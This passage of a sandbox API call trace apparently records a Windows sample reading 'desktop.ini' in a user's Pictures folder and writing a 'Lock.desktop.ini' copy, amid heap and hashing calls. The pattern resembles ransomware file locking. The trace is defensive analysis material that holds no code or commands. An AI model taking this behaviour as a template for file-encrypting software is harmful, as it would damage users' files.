lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.634] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.634] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.634] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.634] CryptDestroyHash (hHash=0x9e2238) returned 1 [0209.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0209.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0209.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0209.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0209.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0209.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.637] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.637] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0209.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0209.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0209.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74880 [0209.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.639] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74880 | out: hHeap=0x2af0000) returned 1 [0209.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.639] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0209.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0209.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ed020 [0209.645] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.645] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0209.645] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0209.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75160 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0209.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0209.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0209.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.650] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0209.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a683a8 [0209.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f8) returned 0x2a75360 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 